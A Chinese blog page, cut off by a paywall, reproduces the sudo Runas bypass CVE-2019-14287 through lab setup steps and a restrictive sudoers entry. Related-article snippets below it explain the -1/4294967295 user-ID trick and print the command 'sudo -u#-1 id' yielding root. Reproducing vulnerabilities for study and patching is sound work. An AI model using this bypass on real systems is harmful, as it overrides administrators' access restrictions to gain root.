CVE-2019-14287 linux sudo root 权限绕过漏洞复现

最新推荐文章于 2022-08-07 16:21:17 发布
最新推荐文章于 2022-08-07 16:21:17 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 网络安全 软件使用 网络抓包 文章标签: 漏洞利用 sudo 权限绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42433054/article/details/102592986
版权

CVE-2019-14287 linux sudo root 权限绕过漏洞复现

1、准备工具,kali linux,或者任何版本的linux,查看sudo版本

root@kali:~# sudo -V

Sudo version 1.8.21p2

明显该版本低于1.8.28。可以进行漏洞利用。

2、创建test用户,并分配密码

root@kali:/etc# useradd test

root@kali:/etc# passwd test

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

3、切换到etc目录下面,创建test用户,编辑sudoers文件,添加test ALL=(ALL,!root) /usr/bin/vim行。

 

root@kali:~# cd /etc

root@kali:/etc# vi sudoers

 

#

# This file MUST be edited with the 'visudo' command as root.

#

# Please consider adding local content in /etc/sudoers.d/ instead of

# directly modifying this file.

#

# See the man page for details on how to write a sudoers file.

#

Defaults        env_reset

Defaults        mail_badpass

Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

 

# Host alias specification

 

# User alias specification

 

# Cmnd alias specification

 

# User privil

最低0.47元/天 解锁文章
sinfoyou
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux sudo root 权限绕过漏洞(CVE-2019-14287)
Sylon的博客
10-15 3650
0x01 逛圈子社区论坛 看到了 linux sudo root 权限绕过漏洞(CVE-2019-14287) 跟着复现下 综合来说 这个漏洞作用不大 需要以下几个前提条件 1.知道当前普通用户的密码 2.当前普通用户在souduers文件中 3.本地提权需要本地操作 估计远程ssh连接的终端会失败 0x02 此漏洞可以使受限制的用户运行root命令 1.8.28之前的...
linux sudo root 权限绕过漏洞(CVE-2019-14287)复现
YJJYXM的博客
10-31 476
漏洞描述 2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。 此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。 具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止...
CVE-2019-14287:sudo 权限绕过漏洞复现
weixin_44215027的博客
10-18 312
CVE-2019-14287:sudo 权限绕过漏洞复现 参考:Ms08067安全实验室 实验环境 kali win10 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先,检查sudo的版本: 之后创建一个新用户: useradd test passwd test 然后,切换用户为test su test 在/etc/sudoers中插入 之后就可以通过vim来进行权限绕过。...
CVE-2019-14287 sudo权限绕过漏洞复现
春日野穹
10-24 1957
0x1 引言 近日 ,sudo 被爆光一个漏洞,非授权的特权用户可以绕过限制获得特权,也就是说如果将sudo配置为允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令的话,那么攻击者将有可能通过制定用户ID -1或4294967295来以root权限执行恶意命令,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。官方的修复公告请见:https://www...
CVE-2019-14287sudo 权限绕过漏洞复现
shy的博客
10-17 241
Linux sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。 使用权限:在 /etc/sudoers 中有出现的使用者。 1.新建用户adduser shy 2.更改密码passwd shy 3.修改/etc/sodoers/文件,由于sudoers文件只有只读权限,不能修改,所以要先赋予它写权限 4.修改/et...
CVE-2019-14287sudo权限绕过漏洞
Sulli的博客
10-18 243
实验环境 Kali 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先看一下自身Kali的sudo版本,命令:sudo -V 符合条件,接下来需要新建一个test用户,命令:useradd test passwd test 然后vi进入sudoers,命令:vi /etc/sudoers 在root ALL=(ALL:ALL) ALL下添加test用户的配置:test ALL=(AL...
CVE-2019-14287sudo 权限绕过漏洞复现过程)
大方子
10-16 688
实验环境: kali 影响范围: sudo 1.8.28 之前的所有版本 复现过程 查询下sudo的版本 sudo -V 创建用户 useradd test passwd test 编辑下sudoers文件 这里添加了 test ALL=(ALL, !root) /usr/bin/vim 这里表示 test 可以 任意主机上...
升级sudo版本至1.9.2,解决Sudo权限绕过漏洞(CVE-2019-14287)
天道酬勤
09-16 3117
1. 环境 系统:Centos7 sudo:1.8.23(使用 sudo -V) 目标sudo:1.9.2 2. 准备 查看本地sudo版本 sudo -V [root@root1 data]# sudo -V Sudo version 1.8.23 官网查看最新版本文件 https://www.sudo.ws/dist/ 3.下载最新版本到服务器并解压 wget https://www.sudo.ws/dist/sudo-1.9.2.tar.gz && tar -zx
sudo权限绕过漏洞复现CVE-2019-14287
锋刃科技的博客
06-25 849
前言 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户能够切换的用户权限 CVE-2019-14287是管理员在配置文件中用了ALL关键词后造成的。 影响版本 sudo < 1.8.28 利用条件 1、sudo -v < 1.8.28 2、知道当前用户的密码 3、当前用户存在于sudo权限列表 我们来看一下/etc/sudoers 漏洞复现 sudo -u#-...
linux 漏洞 网站,linux sudo root 权限绕过漏洞(CVE-2019-14287)
weixin_39630498的博客
05-14 226
漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止使用的...
linux 漏洞CVE-2019-14287CVE-2021-4034
任雪飘的博客
02-26 4909
大家好,我是任雪飘,一个刚接触web的菜鸡。我们今天一起复现一下linux老版本漏洞,普通用户利用sudo获得系统root权限操作系统! 现在我们重新创建一个新用户 给这个用户设置策略,就是不给他root权限,气死你 ceshi1 这个账号确实没有了root 权限的身份了 现在我们测试这个漏洞是不是存在 既然是root 权限了,那我们修改其他用户的密码吧!看下图是不是完美了 到此处CVE-2019-14287 漏洞复现完毕。 接下 下来我们就要去玩脚本...
CVE-2019-14287 sudo提权漏洞分析
独行者103的专栏
10-18 541
一、本文目的 解释sudo提权漏洞 简要说明基础概念在安全领域的重要性 二、漏洞特点。 本漏洞sudo在处理user id为-1和4294967295(232−12^{32}-1232−1)即可,为什么呢? 下面做出解释。 三、漏洞分析 根据Linux Interface Programming的解释,首先我们要知道uid的类型: struct passwd { char *pw_name; ...
CVE-2019-14287sudo 权限提升漏洞
冠霖L的博客
11-02 587
0x00 漏洞介绍 sudo本地权限提升漏洞CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令 0x01 影响版本 sudo < 1.8.28 0x02 sudo作用 sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性 0x03 ...
mac linux sudo 密码,Sudo bug 可导致 Linux和macOS 普通用户获得 root 权限
weixin_29201933的博客
05-06 191
原标题:Sudo bug 可导致 Linux和macOS 普通用户获得 root 权限正文存在十年之久的sudo漏洞Linux和macOS中公开,它允许任何用户获得root特权,现在终于在1.8.31版本中对其进行了修复。该安全漏洞位于pwfeedback选项中,该选项默认在Linux Mint和elementary OS等发行版中启用。由于存在此错误,即使用户未在sudoers文件中列出,也可...
关闭第一次sudo权限警告
AI_Fanatic的博客
12-18 2091
打开终端首次运行sudo都会抛出警告,内容如下: We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great respons
linux sudo 命令无法使用,Linux运维知识之解决Linux下无法使用sudo命令问题
weixin_30762363的博客
04-28 3371
本文主要向大家介绍了Linux运维知识之解决Linux下无法使用sudo命令问题,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。问题描述使用普通用户登录后在终端中执行sudo命令时提示以下错误:WetrustyouhavereceivedtheusuallecturefromthelocalSystemAdministrator.Itusually...
sudo相关漏洞CVE-2019-18634、CVE-2019-14287
悦分享
08-07 693
实际上,只要用户的权限足够高,即拥有最高sudo权限的用户,并且在Runas规范中定义了ALL关键字的话,他们就可以运行Runas规范中明确禁止使用的那些root命令,而且以这种方式运行的命令其日志项所显示的目标用户为4294967295,而不是root。但是,sudo日志条目中记录下的命令运行用户的ID为“4294967295”,而并非root用户(或用户ID为“0”),除此之外,因为用户ID是通过-u选项指定的,并且不会在密码数据库中存储,所以PAM会话模块也不会运行。上述命令运行之后,将返回“0”。.
CentOS: xxx is not in the sudoers file. This incident will be reported.
疯魔coding君的博客
04-08 879
问题 在 centos 中使用非 root 用户执行 sudo 命令的时候会提示:xxx is not in the sudoers file. This incident will be reported. We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the pr
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
最新发布
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值